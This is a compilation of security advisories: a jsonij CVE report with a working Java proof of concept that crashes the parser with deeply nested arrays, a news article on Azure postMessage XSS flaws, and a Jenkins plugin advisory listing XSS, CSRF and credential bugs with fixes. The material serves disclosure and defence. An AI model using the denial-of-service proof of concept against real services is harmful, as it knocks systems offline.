An issue was discovered jmarsden/jsonij thru 0.5.2 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies.

Using jsonij to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

Exception in thread "main" java.lang.StackOverflowError
    at jsonij.ArrayImp.internalType(ArrayImp.java:53)
    at jsonij.Value.<init>(Value.java:54)
    at jsonij.ArrayImp.<init>(ArrayImp.java:44)
    at jsonij.JSON$Array.<init>(JSON.java:326)
    at jsonij.parser.JSONParser.parseArray(JSONParser.java:271)
    at jsonij.parser.JSONParser.parseValue(JSONParser.java:180)
    at jsonij.parser.JSONParser.parseArray(JSONParser.java:275)
    at jsonij.parser.JSONParser.parseValue(JSONParser.java:180)
    at jsonij.parser.JSONParser.parseArray(JSONParser.java:275)
    at jsonij.parser.JSONParser.parseValue(JSONParser.java:180)
    at jsonij.parser.JSONParser.parseArray(JSONParser.java:275)

        <dependency>
            <groupId>cc.plural</groupId>
            <artifactId>jsonij</artifactId>
            <version>0.5.2</version>
        </dependency>

import jsonij.Value;
import jsonij.parser.JSONParser;
import jsonij.parser.ParserException;

public class PoC {

    public final static int TOO\_DEEP\_NESTING \= 9999;
    public final static String TOO\_DEEP\_DOC \= \_nestedDoc(TOO\_DEEP\_NESTING, "\[ ", "\] ", "0");

    public static String \_nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb \= new StringBuilder(nesting \* (open.length() + close.length()));
        for (int i \= 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) \== 0) {
                sb.append("\\n");
            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i \= 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) \== 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) throws ParserException {
        String jsonString \= TOO\_DEEP\_DOC;
        JSONParser jsonParser \= new JSONParser();
        Value parse \= jsonParser.parse(jsonString);
    }
}

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b))
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（https://github.com/google/gson/commit/2d01d6a20f39881c692977564c1ea591d9f39027）))

‌

CVE-2023-34614: Stack overflow error caused by jsonij parsing of untrusted JSON String

Two "dangerous" security vulnerabilities have been disclosed in Microsoft Azure Bastion and Azure Container Registry that could have been exploited to carry out cross-site scripting (XSS) attacks.
"The vulnerabilities allowed unauthorized access to the victim's session within the compromised Azure service iframe, which can lead to severe consequences, including unauthorized data access,

Cloud Security / Vulnerability

Two "dangerous" security vulnerabilities have been disclosed in Microsoft Azure Bastion and Azure Container Registry that could have been exploited to carry out cross-site scripting (XSS) attacks.

"The vulnerabilities allowed unauthorized access to the victim's session within the compromised Azure service iframe, which can lead to severe consequences, including unauthorized data access, unauthorized modifications, and disruption of the Azure services iframes," Orca security researcher Lidor Ben Shitrit said in a report shared with The Hacker News.

XSS attacks take place when threat actors inject arbitrary code into an otherwise trusted website, which then gets executed every time when unsuspecting users visit the site.

The two flaws identified by Orca leverage a weakness in the postMessage iframe, which enables cross-origin communication between Window objects.

This meant that the shortcoming could be abused to embed endpoints within remote servers using the iframe tag and ultimately execute malicious JavaScript code, leading to the compromise of sensitive data.

However, in order to exploit these weaknesses, a threat actor would have to conduct reconnaissance on different Azure services to single out vulnerable endpoints embedded within the Azure portal that may have missing X-Frame-Options headers or weak Content Security Policies (CSPs).

"Once the attacker successfully embeds the iframe in a remote server, they proceed to exploit the misconfigured endpoint," Ben Shitrit explained. "They focus on the postMessage handler, which handles remote events such as postMessages."

By analyzing the legitimate postMessages sent to the iframe from portal.azure\[.\]com, the adversary could subsequently craft appropriate payloads by embedding the vulnerable iframe in an actor-controlled server (e.g., ngrok) and creating a postMessage handler that delivers the malicious payload.

Thus when a victim is lured into visiting the compromised endpoint, the "malicious postMessage payload is delivered to the embedded iframe, triggering the XSS vulnerability and executing the attacker's code within the victim's context."

UPCOMING WEBINAR

🔐 Mastering API Security: Understanding Your True Attack Surface

Discover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!

Join the Session

In a proof-of-concept (PoC) demonstrated by Orca, a specially crafted postMessage was found to be able to manipulate the Azure Bastion Topology View SVG exporter or Azure Container Registry Quick Start to execute an XSS payload.

Following responsible disclosure of the flaws on April 13 and May 3, 2023, Microsoft rolled out security fixes to remediate them. No further action is required on the part of Azure users.

The disclosure comes more than a month after Microsoft plugged three vulnerabilities in the Azure API Management service that could be abused by malicious actors to gain access to sensitive information or backend services.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Severe Vulnerabilities Reported in Microsoft Azure Bastion and Container Registry

Jenkins AWS CodeCommit Trigger Plugin 3.0.12 and earlier does not restrict the AWS SQS queue name path parameter in an HTTP endpoint, allowing attackers with Item/Read permission to obtain the contents of arbitrary files on the Jenkins controller file system.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Jenkins (core)
*   AWS CodeCommit Trigger Plugin
*   Checkmarx Plugin
*   Digital.ai App Management Publisher Plugin
*   Dimensions Plugin
*   Maven Repository Server Plugin
*   Sonargraph Integration Plugin
*   Team Concert Plugin
*   Template Workflows Plugin

**Descriptions****CSRF protection bypass vulnerability**

**SECURITY-3135 / CVE-2023-35141**  
**Severity (CVSS):** High  
**Description:**

Jenkins provides context menus for various UI elements, like links to jobs and builds, or breadcrumbs.

In Jenkins 2.399 and earlier, LTS 2.387.3 and earlier, POST requests are sent in order to load the list of context actions. If part of the URL includes insufficiently escaped user-provided values, a victim may be tricked into sending a POST request to an unexpected endpoint (e.g., the Script Console) by opening a context menu.

As of publication of this advisory, we are aware of insufficiently escaped context menu URLs for label expressions, allowing attackers with Item/Configure permissions to exploit this vulnerability.

Jenkins 2.400, LTS 2.401.1 sends GET requests to load the list of context actions.

**SSL/TLS certificate validation disabled by default in Checkmarx Plugin**

**SECURITY-2870 / CVE-2023-35142**  
**Severity (CVSS):** Medium  
**Affected plugin: checkmarx**  
**Description:**

Checkmarx Plugin allows to globally enable or disable SSL/TLS validation for connections to the Checkmarx server. Checkmarx Plugin 2022.4.3 and earlier disables it by default. Unless changed by an administrator, it would cause all connections to the Checkmarx server to ignore SSL/TLS validation, thereby enabling potential man-in-the-middle attacks.

Checkmarx Plugin 2023.2.6 enables SSL/TLS validation by default. Administrators who do not want SSL/TLS validation for connections to the Checkmarx server to be disabled are advised to review their configuration.

**Missing permission checks in Team Concert Plugin**

**SECURITY-2932 / CVE pending**  
**Severity (CVSS):** Medium  
**Affected plugin: teamconcert**  
**Description:**

Team Concert Plugin 2.4.1 and earlier does not perform permission checks in methods implementing form validation.

This allows attackers with Overall/Read permission to check for the existence of an attacker-specified file path on the Jenkins controller file system.

Team Concert Plugin 2.4.2 requires Overall/Administer permission for the affected form validation methods.

**Missing permission check in Dimensions Plugin allows enumerating credentials IDs**

**SECURITY-3138 / CVE-2023-32261**  
**Severity (CVSS):** Medium  
**Affected plugin: dimensionsscm**  
**Description:**

Dimensions Plugin 0.9.3 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.

An enumeration of credentials IDs in Dimensions Plugin 0.9.3.1 requires the appropriate permissions.

**Exposure of system-scoped credentials in Dimensions Plugin**

**SECURITY-3143 / CVE-2023-32262**  
**Severity (CVSS):** Medium  
**Affected plugin: dimensionsscm**  
**Description:**

Dimensions Plugin 0.9.3 and earlier does not set the appropriate context for credentials lookup, allowing the use of System-scoped credentials otherwise reserved for the global configuration.

This allows attackers with Item/Configure permission to access and capture credentials they are not entitled to.

Dimensions Plugin 0.9.3.1 defines the appropriate context for credentials lookup.

**Stored XSS vulnerability in Maven Repository Server Plugin**

**SECURITY-3156 / CVE-2023-35143**  
**Severity (CVSS):** High  
**Affected plugin: repository**  
**Description:**

Maven Repository Server Plugin 1.10 and earlier does not escape the versions of build artifacts on the Build Artifacts As Maven Repository page.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control maven project versions in pom.xml.

**Stored XSS vulnerability in Maven Repository Server Plugin**

**SECURITY-2951 / CVE-2023-35144**  
**Severity (CVSS):** High  
**Affected plugin: repository**  
**Description:**

Maven Repository Server Plugin 1.10 and earlier does not escape project and build display names on the Build Artifacts As Maven Repository page.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to change project or build display names.

**Stored XSS vulnerability in Sonargraph Integration Plugin**

**SECURITY-3155 / CVE-2023-35145**  
**Severity (CVSS):** High  
**Affected plugin: sonargraph-integration**  
**Description:**

Sonargraph Integration Plugin 5.0.1 and earlier does not correctly escape the file path and the project name for the Log file field form validation.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

**Stored XSS vulnerability in Template Workflows Plugin**

**SECURITY-3166 / CVE-2023-35146**  
**Severity (CVSS):** High  
**Affected plugin: template-workflows**  
**Description:**

Template Workflows Plugin 41.v32d86a\_313b\_4a and earlier does not escape names of jobs used as buildings blocks for Template Workflow Job.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to create jobs.

**Arbitrary file read vulnerability in AWS CodeCommit Trigger Plugin**

**SECURITY-3099 / CVE-2023-35147**  
**Severity (CVSS):** Medium  
**Affected plugin: aws-codecommit-trigger**  
**Description:**

AWS CodeCommit Trigger Plugin allows downloading activity logs of AWS Simple Queue Service (SQS) queues.

AWS CodeCommit Trigger Plugin 3.0.12 and earlier does not restrict the queue name path parameter in the corresponding HTTP endpoint, allowing attackers with Item/Read permission to obtain the contents of arbitrary files on the Jenkins controller file system.

**CSRF vulnerability and missing permission checks in Digital.ai App Management Publisher Plugin**

**SECURITY-2911 / CVE-2023-35148 (CSRF), CVE-2023-35149 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: ease-plugin**  
**Description:**

Digital.ai App Management Publisher Plugin 2.6 and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, these HTTP endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

**Severity**

*   SECURITY-2870: Medium
*   SECURITY-2911: Medium
*   SECURITY-2932: Medium
*   SECURITY-2951: High
*   SECURITY-3099: Medium
*   SECURITY-3135: High
*   SECURITY-3138: Medium
*   SECURITY-3143: Medium
*   SECURITY-3155: High
*   SECURITY-3156: High
*   SECURITY-3166: High

**Affected Versions**

*   **Jenkins weekly** up to and including 2.399
*   **Jenkins LTS** up to and including 2.387.3
*   **AWS CodeCommit Trigger Plugin** up to and including 3.0.12
*   **Checkmarx Plugin** up to and including 2022.4.3
*   **Digital.ai App Management Publisher Plugin** up to and including 2.6
*   **Dimensions Plugin** up to and including 0.9.3
*   **Maven Repository Server Plugin** up to and including 1.10
*   **Sonargraph Integration Plugin** up to and including 5.0.1
*   **Team Concert Plugin** up to and including 2.4.1
*   **Template Workflows Plugin** up to and including 41.v32d86a\_313b\_4a

**Fix**

*   **Jenkins weekly** should be updated to version 2.400
*   **Jenkins LTS** should be updated to version 2.401.1
*   **Checkmarx Plugin** should be updated to version 2023.2.6
*   **Dimensions Plugin** should be updated to version 0.9.3.1
*   **Team Concert Plugin** should be updated to version 2.4.2

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   AWS CodeCommit Trigger Plugin
*   Digital.ai App Management Publisher Plugin
*   Maven Repository Server Plugin
*   Sonargraph Integration Plugin
*   Template Workflows Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Alvaro Muñoz (@pwntester), GitHub Security Lab** for SECURITY-3143, SECURITY-3155, SECURITY-3156, SECURITY-3166
*   **CC Bomber, Kitri BoB** for SECURITY-2951
*   **Daniel Beck, CloudBees Inc.** for SECURITY-2870
*   **Daniel Beck, CloudBees, Inc.** for SECURITY-2932
*   **Kevin Guerroudj, CloudBees, Inc.** for SECURITY-3135, SECURITY-3138
*   **Kevin Guerroudj, CloudBees, Inc. and Wadeck Follonier, CloudBees, Inc.** for SECURITY-2911
*   **Tony Torralba (@atorralba), GitHub Security Lab** for SECURITY-3099

CVE-2023-35147: Jenkins Security Advisory 2023-06-14

Jenkins Maven Repository Server Plugin 1.10 and earlier does not escape the versions of build artifacts on the Build Artifacts As Maven Repository page, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control maven project versions in `pom.xml`.

CVE-2023-35143: Jenkins Security Advisory 2023-06-14

Jenkins Sonargraph Integration Plugin 5.0.1 and earlier does not escape the file path and the project name for the Log file field form validation, resulting in a stored cross-site scripting vulnerability exploitable by attackers with Item/Configure permission.

CVE-2023-35145: Jenkins Security Advisory 2023-06-14

Jenkins Maven Repository Server Plugin 1.10 and earlier does not escape project and build display names on the Build Artifacts As Maven Repository page, resulting in a stored cross-site scripting (XSS) vulnerability.

CVE-2023-35144: Jenkins Security Advisory 2023-06-14

In Jenkins 2.399 and earlier, LTS 2.387.3 and earlier, POST requests are sent in order to load the list of context actions. If part of the URL includes insufficiently escaped user-provided values, a victim may be tricked into sending a POST request to an unexpected endpoint by opening a context menu.

CVE-2023-35141: Jenkins Security Advisory 2023-06-14

Jenkins Template Workflows Plugin 41.v32d86a_313b_4a and earlier does not escape names of jobs used as buildings blocks for Template Workflow Job, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to create jobs.

CVE-2023-35146: Jenkins Security Advisory 2023-06-14

Jenkins Checkmarx Plugin 2022.4.3 and earlier disables SSL/TLS validation for connections to the Checkmarx server by default.

CVE-2023-35142: Jenkins Security Advisory 2023-06-14

A missing permission check in Jenkins Digital.ai App Management Publisher Plugin 2.6 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL, capturing credentials stored in Jenkins.

Tag

#java